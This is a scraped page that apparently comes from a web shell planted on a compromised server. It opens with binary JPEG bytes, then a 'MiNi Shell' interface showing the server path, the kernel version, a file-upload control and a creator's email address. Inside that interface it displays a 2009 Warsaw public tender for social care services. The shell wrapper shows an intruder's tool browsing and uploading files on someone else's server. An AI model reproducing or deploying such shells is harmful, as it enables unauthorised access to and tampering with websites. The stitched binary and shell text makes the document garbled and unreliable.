JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/220616-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usług opiekuńczych oraz specjalistycznych usług opiekuńczych  dla osób korzystających z pomocy Ośrodka Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy</b><br>
<b>Numer ogłoszenia: 220616 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Włochy m.st. Warszawy , Ul. Czereśniowa 35, 02-457 Warszawa, woj. mazowieckie, tel. 022 8639837, faks 022 8639837 w. 110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opswlochy.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług opiekuńczych oraz specjalistycznych usług opiekuńczych  dla osób korzystających z pomocy Ośrodka Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie przez Wykonawcę usług opiekuńczych oraz specjalistycznych usług opiekuńczych na rzecz osób korzystających z pomocy Ośrodka Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy przyznanych  na podstawie art. 50 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (j.t. Dz. U. z 2008 r., Nr 115, poz. 728 z późn. zm.), zamieszkałych na terenie Dzielnicy Włochy m.st. Warszawy  i  wskazanych przez Zamawiającego. 
2.Usługi, o których mowa w pkt 3.2., obejmują usługi opiekuńcze oraz specjalistyczne usługi opiekuńcze świadczone na rzecz osób samotnych, które z powodu wieku, choroby lub innych przyczyn wymagają pomocy innych osób, a są jej pozbawione oraz osób, które wymagają pomocy innych osób, a rodzina, a także wspólnie zamieszkujący małżonek, wstępni, zstępni nie mogą takiej pomocy zapewnić.
3.Świadczenie usług objętych zamówieniem odbywać się będzie codziennie przez  siedem dni w tygodniu, w tym w niedziele i święta w okresie od dnia 01.08.2009 r. do dnia 31.10.2009 r.
4.Szczegółowy zakres usług opiekuńczych oraz specjalistycznych usług opiekuńczych objętych niniejszym, zamówieniem opisany jest w pkt 3.12-3.13 SIWZ.
5.Szacunkowa liczba osób, na rzecz których Wykonawca świadczyć będzie usługi objęte   niniejszym zamówieniem wynosi: 
1)47 osób miesięcznie  - usługi opiekuńcze,
2)13 osób miesięcznie - specjalistyczne usługi opiekuńcze.
6.Szacunkowa liczba godzin usług w okresie objętym zamówieniem (umową) tj. w okresie  od dnia 01.08.2009 r. do dnia 31.10.2009 r. wynosi:
1)3450 godzin -  usług opiekuńczych;
2)832 godzin - specjalistycznych usług opiekuńczych.
7.Zamawiający zastrzega sobie prawo kontroli realizacji umowy przez Wykonawcę, w tym: kontroli merytorycznej, obejmującej kontrolę zgodności świadczonych usług z warunkami umowy - w miejscu świadczenia usług (w miejscu zamieszkania osób, na rzecz których świadczone są usługi objęte niniejszym zamówieniem) oraz kontroli dokumentów Wykonawcy w powyższym zakresie.                            Zamawiającemu przysługuje prawo do:
1)bezpośrednich kontaktów z osobami, przy pomocy których Wykonawca świadczy usługi objęte zamówieniem oraz prawo przekazywania tym pracownikom uwag i spostrzeżeń dotyczących prawidłowości świadczonych usług,
2)występowania do Wykonawcy o zmianę osoby świadczącej usługi.
8.Zamawiający wskaże Wykonawcy osoby uprawnione do korzystania z usług opiekuńczych i specjalistycznych usług opiekuńczych objętych  niniejszym zamówieniem, określając jednocześnie następujące dane tych osób oraz informacje o zakresie przyznanych usług:
1)imię,  nazwisko oraz adres;
2)rodzaj przyznanych usług (jakie mają być świadczone na rzecz danej osoby);
3)ilość godzin przyznanych usług;
4)czas na jaki przyznane zostały usługi; 
5)stawkę odpłatności za jedną godzinę usług, jaką zobowiązana jest ponosić osoba korzystająca według decyzji Zamawiającego w sprawie przyznania usług; 
6)zalecenia lekarza dotyczące zakresu świadczonych usług,  w przypadku wydania takich zaleceń.
9.Wykonawca zobowiązuje się do rozpoczęcia świadczenia usług na rzecz poszczególnych osób wskazanych przez Zamawiającego, na podstawie odrębnego pisemnego zlecenia Zamawiającego, od dnia wskazanego w tym zleceniu.
10.W wyjątkowych i nagłych wypadkach dopuszcza się możliwość ustnego (telefonicznego) zlecenia usług przez Zamawiającego jak też możliwość ustnego poinformowania Wykonawcy o przerwaniu świadczenia usług opiekuńczych lub specjalistycznych usług opiekuńczych  w odniesieniu do poszczególnych osób - wskazanych przez Zamawiającego, co wymaga bezzwłocznego potwierdzenia pisemnym zleceniem lub informacją Zamawiającego z doręczeniem Wykonawcy.
11.Szczegółowy zakres usług opiekuńczych:
1)podstawowa pomoc w czynnościach życia codziennego oraz załatwianiu spraw:
a)podstawowe zakupy artykułów spożywczych, przemysłowych, higienicznych, realizacja recept, inne zlecone przez osobę korzystającą z usług; dokonywane w najbliższej okolicy miejsca zamieszkania osoby, na rzecz której świadczone są usługi;
b)przygotowywanie posiłków (także dietetycznych), z zabezpieczeniem co najmniej raz   dziennie jednego gorącego posiłku, 
c)mycie naczyń,
d)pomoc przy spożywaniu posiłków,
e)sprzątanie (bez mycia okien i prania dywanów) pokoju osoby, na rzecz której świadczone są usługi, w tym sprzątanie kuchni, łazienki i urządzeń sanitarnych, 
f)zmiana odzieży, bielizny osobistej i pościelowej,
g)zanoszenie bielizny do pralni i jej odbiór,
h)pranie bielizny osobistej i lekkiej odzieży, prasowanie,
i)wynoszenie śmieci,
j)przynoszenie wody, węgla i palenie w piecu (w przypadku takiej konieczności),
k)załatwianie bieżących spraw urzędowych, w tym wnoszenie opłat, wysyłanie korespondencji, zgłaszanie napraw urządzeń  domowych i sprzętu, wymiana książek w bibliotece,
l)pomoc w prowadzeniu gospodarstwa domowego,
m)zamawianie wizyt w placówkach zdrowia oraz pomoc w dostaniu się do placówek służby zdrowia oraz do placówek rehabilitacyjnych;
2)podstawowa opieka:
a)podawanie leków wg zaleceń lekarza,
b)dbałość o kondycję psychoruchową oraz zapewnienie kontaktu z otoczeniem  poprzez:
b.a)organizowanie spacerów, 
b.b)prowadzenie rozmów,
b.c)czytanie prasy, książek, 
b.d)pomoc w prowadzeniu korespondencji,
b.e)stały kontakt z rodziną osoby, na rzecz której świadczone są usługi, 
b.f)wizyty z osobą, na rzecz której świadczone są usługi w urzędach i placówkach kulturalnych,
b.g)dbałość o bezpieczeństwo podczas wykonywania czynności życia codziennego,
b.h)odwiedzanie osoby samotnej w przypadku jej pobytu  w szpitalu;
3)współpraca:
a)utrzymywanie stałego kontaktu z pracownikiem socjalnym Zamawiającego,  z lekarzem i  pielęgniarką środowiskową,
b)informowanie Wykonawcy oraz pracownika Zamawiającego o wszelkich zmianach stanu zdrowia osoby, na rzecz której świadczone są usługi oraz o jej potrzebach w zakresie dodatkowej pomocy społecznej, a także o nieobecności w domu, skierowaniu do szpitala i innych zdarzeniach mających wpływ na sytuację i przebieg wykonywania usług.
12.Szczegółowy zakres specjalistycznych usług opiekuńczych.
1)uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza:
a)kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:
 a.a)  samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu,
a.b)   dbałość o higienę i wygląd,
a.c)  utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu  nauki  i pracy oraz ze społecznością lokalną,
a.d)  wspólne organizowanie i spędzanie czasu wolnego,
a.e)  korzystanie z usług różnych instytucji,
b)interwencje i pomoc w życiu w rodzinie, w tym:
b.a) pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo      specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,
b.b)  ułatwienie dostępu do edukacji i kultury,
b.c)  doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w   formie specjalistycznych usług,
b.d) kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi,
b.e)   współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej,
c)pomoc w załatwianiu spraw urzędowych, w tym:
 c.a)   w uzyskaniu świadczeń socjalnych, emerytalno-rentowych,
c.b)   w wypełnieniu dokumentów urzędowych,
d) pomoc w gospodarowaniu pieniędzmi, w tym:
d.a)   nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,
d.b)   pomoc w uzyskaniu ulg w opłatach,
d.c)  zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe;
2)pielęgnacja - jako wspieranie procesu leczenia, w tym:
a)pomoc w dostępie do świadczeń zdrowotnych,
b)uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,
c)pomoc w zakupie lub zamawianiu leków w aptece,
d)nadzór nad przyjmowaniem leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,
e)w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny,
f)pomoc w dotarciu do placówek służby zdrowia oraz placówek rehabilitacyjnych zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii;
3. pomoc mieszkaniowa, w tym w:
a)uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,
b)organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,
c)kształtowaniu właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu;
4)współpraca:
a)utrzymywanie stałego kontaktu z pracownikiem socjalnym ds. usług,  Zamawiającego, z lekarzem i  pielęgniarką środowiskową,
b)informowanie Wykonawcy usług oraz pracownika socjalnego ds. usług Zamawiającego o wszelkich zmianach stanu zdrowia osoby, na rzecz której świadczone są usługi oraz o jej potrzebach w zakresie dodatkowej pomocy społecznej, a także o nieobecności w domu, skierowaniu do szpitala i innych zdarzeniach mających wpływ na sytuację i przebieg wykonywania usług,
c)współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno-terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług.
13.Wykonawca jest odpowiedzialny za wykonanie wszystkich obowiązków wchodzących w zakres zleconych usług, zgodnie z niniejszym zamówieniem oraz z umową zawartą z Zamawiającym.
14.Do świadczenia usług opiekuńczych oraz specjalistycznych usług opiekuńczych Wykonawca zobowiązany jest zatrudnić osoby sprawne fizycznie i intelektualnie, zdolne do wykonywania  prac fizycznych, posiadające umiejętność utrzymywania prawidłowych kontaktów interpersonalnych.
15.Wykonawca zapewni świadczenie usług opiekuńczych przez osoby odpowiednio przeszkolone przez Wykonawcę w zakresie wykonywania usług objętych umową.
16.Wykonawca zapewni świadczenie specjalistycznych usług opiekuńczych przez osoby posiadające kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.
17.Wykonawca zatrudni co najmniej jedną osobę do spraw koordynacji usług świadczonych przez osoby realizujące usługi bezpośrednio u osób uprawnionych, która będzie jednocześnie osobą upoważnioną do stałych kontaktów z Zamawiającym w zakresie realizacji usług objętych umową.
18.Wykonawca ponosi odpowiedzialność za staranność w wyborze osób, przy pomocy których będzie świadczył usługi objęte niniejszym zamówieniem oraz prawidłowość wykonywanych przez nie czynności i obowiązków w powyższym zakresie.
19.Wykonawca wskaże Zamawiającemu numery telefonów kontaktowych i  numer faksu Wykonawcy, inne informacje oraz ustalenia niezbędne dla sprawnego i terminowego wykonania zamówienia.
20.Wykonawca ponosi odpowiedzialność za szkody wyrządzone przez Wykonawcę, w tym przez osoby, przy pomocy których Wykonawca realizuje zamówienie -  osobom korzystającym z usług w związku ze świadczeniem usług objętych umową. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę w trakcie wykonywania zamówienia.
21.Wykonawca zobowiązany jest wskazać, które części zamówienia zamierza zlecić podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.31.11.00-3, 85.31.12.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 uPzp i nie podlegają wykluczeniu z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 uPzp.:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedze i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
3)lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
4)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.Ocena spełniania warunków nastąpi na podstawie oświadczeń i dokumentów, określonych w  SIWZ.
3.Ocena spełniania warunków wymaganych w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia. Niespełnienie któregokolwiek z warunków spowoduje wykluczenie Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia warunków udziału w postępowaniu Wykonawca w ramach złożonej oferty składa Zamawiającemu następujące dokumenty  i oświadczenia  potwierdzające spełnianie tych warunków:
1)oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust.1 uPzp wraz z oświadczeniem, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 uPzp, sporządzone zgodnie ze wzorem określonym w Załączniku Nr 2 do SIWZ,
2)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)wykaz co najmniej 2 wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - wykaz usług wykonanych w tym okresie,  których  rodzaj i wartość była, nie mniejsza niż wartość złożonej oferty przez Wykonawcę, wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie według wzoru określonego w Załączniku Nr 3 do SIWZ.
7)wykaz  osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji wskazującymi, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają odpowiednie kwalifikacje oraz wymagane uprawnienia zgodnie z wymogami określonymi w ppkt 3.16 - 3.18 SIWZ - sporządzony według wzoru określonego w Załączniku Nr 4 do SIWZ,
8)wykaz podwykonawców - sporządzony według wzoru określonego w Załączniku Nr 5 do SIWZ,
9)polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej przez niego działalności na kwotę nie mniejszą niż 100.000,00 zł.
2.Wykaz innych dokumentów, które zobowiązani są dostarczyć Wykonawcy wraz ze złożoną ofertą:
1)parafowana każda strona  wzoru umowy - Załącznik Nr  6 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.opswlochy.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej  Dzielnicy Włochy m. st. Warszawy, ul. Czereśniowa 35, 02-457 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2009 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy, ul. Czereśniowa 35, 02-457 Warszawa - Sekretariat, II piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com